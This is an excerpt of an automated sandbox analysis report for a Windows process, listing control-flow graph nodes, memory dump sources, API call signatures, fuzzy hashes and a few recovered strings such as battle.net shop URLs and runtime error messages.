53184->53191 53186 7ffbc1b49bf6 53185->53186 53214 7ffbc1b659d0 _unlock_locales 53186->53214 53187 7ffbc1b49c68 53216 7ffbc1b659d0 _unlock_locales 53187->53216 53190 7ffbc1b49cb3 53190->53121 53190->53122 53191->53187 53201 7ffbc1b3c9f0 53191->53201 53194 7ffbc1b49c80 53215 7ffbc1b48310 _CxxThrowException malloc _CxxThrowException free messages 53194->53215 53195 7ffbc1b49cc3 std::bad_alloc::bad_alloc 53197 7ffbc1b49ccd _CxxThrowException 53195->53197 53199 7ffbc1b6592f _lock_locales 53198->53199 53200 7ffbc1b65937 53198->53200 53199->53200 53200->53184 53202 7ffbc1b3cae2 53201->53202 53203 7ffbc1b3ca28 53201->53203 53202->53194 53202->53195 53203->53202 53204 7ffbc1b7cac4 messages 4 API calls 53203->53204 53206 7ffbc1b3ca39 53204->53206 53205 7ffbc1b3cacd 53205->53202 53228 7ffbc1b3b560 7 API calls messages 53205->53228 53206->53205 53217 7ffbc1b3ace0 53206->53217 53214->53191 53215->53187 53216->53190 53218 7ffbc1b65920 __int64 _lock_locales 53217->53218 53219 7ffbc1b3ad05 53218->53219 53220 7ffbc1b3ad53 53219->53220 53221 7ffbc1b3ad39 53219->53221 53234 7ffbc1b3b090 __std_exception_copy 53220->53234 53229 7ffbc1b484a0 setlocale 53221->53229 53224 7ffbc1b3ad64 _CxxThrowException 53235 7ffbc1b3b690 53229->53235 53232 7ffbc1b484e7 53233 7ffbc1b484d9 setlocale 53233->53232 53234->53224 53236 7ffbc1b3b6ad 53235->53236 53237 7ffbc1b3b6f5 53235->53237 53238 7ffbc1b3b6b2 free 53236->53238 53240 7ffbc1b3b6b8 53236->53240 53237->53232 53237->53233 53238->53240 53239 7ffbc1b3b6d1 malloc 53239->53237 53241 7ffbc1b3b6e6 memcpy 53239->53241 53240->53237 53240->53239 53240->53240 53241->53237

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initstd::ios_base::_$AddstdExceptionThrowfputwcfwritestd::ios_base::failure::failurestd::locale::_
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 247381371-1866435925
                                                                                                                                                                            • Opcode ID: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                                                                                            • Instruction ID: 93fa0911a75f695991057169d146ed34935ad19a91ecc8cbaab9bb04efc0ed00
                                                                                                                                                                            • Opcode Fuzzy Hash: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                                                                                            • Instruction Fuzzy Hash: B971C1B6608A4286EB10CF35D0902AE33A0FB44B88F84A032EB4E77B54DF3DD555CB50

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2716750221-0
                                                                                                                                                                            • Opcode ID: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                                                                                            • Instruction ID: 11ca1d8e91cad432378a3d6abcdd3ec4474e212d9bf1466033f962572fcedd7a
                                                                                                                                                                            • Opcode Fuzzy Hash: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A3195B9A0CA02C2EB14DF35E4500BB63A0FB947A0F586232D65D337E6DE2CE4518B04

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_allocmalloc$ConsoleCtrlHandleHandlerModuleSleepfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1258940858-0
                                                                                                                                                                            • Opcode ID: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                                                                                            • Instruction ID: 78e7ae140167701a495b85cd61d4814a91b9d3e42dd23cd5a88623f4a86b2346
                                                                                                                                                                            • Opcode Fuzzy Hash: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 11219D22F4C24342FE34B735A4512B9E6B39F84780FD80475EA8D47297EF2CE48586B1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorExceptionFileLastThrowView
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2958022518-0
                                                                                                                                                                            • Opcode ID: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                                                                                            • Instruction ID: 672cc2288c9a2faf19c92f93e98a07c682f14c65fa403390a4328f94bc92f4f0
                                                                                                                                                                            • Opcode Fuzzy Hash: 5417b77c524c30663f1f256b045522e958b35b3579d87da6e87b169c52188e26
                                                                                                                                                                            • Instruction Fuzzy Hash: D301D465F1864582EF24AB38E450339A390FB84704F900835DB8D4BB91FF3CD4528720

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B484B4
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6B2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6D8
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B690: memcpy.VCRUNTIME140(?,?,?,00007FFBC1B484D4), ref: 00007FFBC1B3B6F0
                                                                                                                                                                            • setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B484DE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$freemallocmemcpy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1663771476-0
                                                                                                                                                                            • Opcode ID: de0bc8ff20c1a892cccc3991225f6002f78959e2e2777f6cb1df57c22036f2db
                                                                                                                                                                            • Instruction ID: 142d530e9298746c7a0c18c0c7717f38971603d6843c5fe891247bf733569daa
                                                                                                                                                                            • Opcode Fuzzy Hash: de0bc8ff20c1a892cccc3991225f6002f78959e2e2777f6cb1df57c22036f2db
                                                                                                                                                                            • Instruction Fuzzy Hash: 32F09665704B426AFF158F62E5940B6A351AF48F80B4890398A0E97755EE2CD0648710

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2803490479-0
                                                                                                                                                                            • Opcode ID: 2ded609dae4ce5e57364cc0bfb32a0ef494e20ef4200fdc9d1d4aa37da518e16
                                                                                                                                                                            • Instruction ID: 8d7c64f0282bec4b6497e18b63415ac27d1cad0c12bc3998d68896553839c7bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 2ded609dae4ce5e57364cc0bfb32a0ef494e20ef4200fdc9d1d4aa37da518e16
                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF08921A1C69141E630962D7400439D2A4AB857A0F644735EBFC477D9EF3DD4514720

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _onexit
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 572287377-0
                                                                                                                                                                            • Opcode ID: 83ae8cda057869e4bcfce759bd0886fbae876962244f8b9fa94d9d0ed1065b8c
                                                                                                                                                                            • Instruction ID: c05baf58110869365eee2200f52c13aac130f96ccfc57f18b8a9aabb892dc861
                                                                                                                                                                            • Opcode Fuzzy Hash: 83ae8cda057869e4bcfce759bd0886fbae876962244f8b9fa94d9d0ed1065b8c
                                                                                                                                                                            • Instruction Fuzzy Hash: C3E0ECA9F2A406D1E714BF35D8A56B60390AF6A384FD03932C40DB5591DD1C9296CF20
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturncef_string_map_allocfree$malloc
                                                                                                                                                                            • String ID: /shop/$battle.net$https$www.battlenet.com.cn
                                                                                                                                                                            • API String ID: 3106151382-2878237680
                                                                                                                                                                            • Opcode ID: 30ebd4300529cf13d2a0f6aac6105ca9c1e8fd502c8f71a02a4b405466ebcc6f
                                                                                                                                                                            • Instruction ID: 3bea7e739a198223368e6f728000960662bd3faee072274f3aed1199a7fe720b
                                                                                                                                                                            • Opcode Fuzzy Hash: 30ebd4300529cf13d2a0f6aac6105ca9c1e8fd502c8f71a02a4b405466ebcc6f
                                                                                                                                                                            • Instruction Fuzzy Hash: C7D16933B09B428AEF20AB75D4503ADA3B6AB04B98F944536CE4D17B99DF38D516C360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$memcpymemmove$malloc
                                                                                                                                                                            • String ID: ([:\/]|\?|\n|$)
                                                                                                                                                                            • API String ID: 2735842428-1527476142
                                                                                                                                                                            • Opcode ID: 94d23265fd06d7eb7b31fa9a22f1bce6258c008eafdf22e478348a61a271287d
                                                                                                                                                                            • Instruction ID: 7743648b86fd227d3d5e75119c3f5e7610dea0ea94b69415bb323609d986336d
                                                                                                                                                                            • Opcode Fuzzy Hash: 94d23265fd06d7eb7b31fa9a22f1bce6258c008eafdf22e478348a61a271287d
                                                                                                                                                                            • Instruction Fuzzy Hash: C3027063F09A4285FF20EBB5D5503ADA372AB14798F944231DE5E17ACADF38D8068390
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturnmalloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1462992686-0
                                                                                                                                                                            • Opcode ID: a7f38d0303b15842b5440bcbd9168077520873a5db10c70a3f6b3d47c523b3e9
                                                                                                                                                                            • Instruction ID: aa1ce57026e37f3e6e816d4452fd157d9a82dd46d3f2d459665e07dc5132612e
                                                                                                                                                                            • Opcode Fuzzy Hash: a7f38d0303b15842b5440bcbd9168077520873a5db10c70a3f6b3d47c523b3e9
                                                                                                                                                                            • Instruction Fuzzy Hash: F581A136A09B8286EB65EF35A4043AAB7B6FB45B84F858034DE8D07758EF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: freemallocmemcpy$memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2260118914-0
                                                                                                                                                                            • Opcode ID: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                                                                                            • Instruction ID: af440f1f26276fae962656934aaeb7084947ba4af7bbcbf97b8dc18d34d05d82
                                                                                                                                                                            • Opcode Fuzzy Hash: f625bcf806322541c94781342d928d36ba4744acfacca47c0fe88d790c7e6fc5
                                                                                                                                                                            • Instruction Fuzzy Hash: 26E15022F09A8689FF20EBB5D4503FDA3B2AB44798F944635DE5E17AC9DF38D4058360
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF79D074F63
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                            • API String ID: 389471666-631824599
                                                                                                                                                                            • Opcode ID: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                                                                                            • Instruction ID: 0a8e2cc2b6aa8992acaa66b8feec5a7df71d951de3d6eda3bbf317d41238a567
                                                                                                                                                                            • Opcode Fuzzy Hash: 1350812c3d0dfa734be90a980c35df2e82d1e245d48463fcd563a86e7718f8f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 67114C36A18B4297E725AB36EA54379B2A5FF44345F804135C68D87A90FF7CE074C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
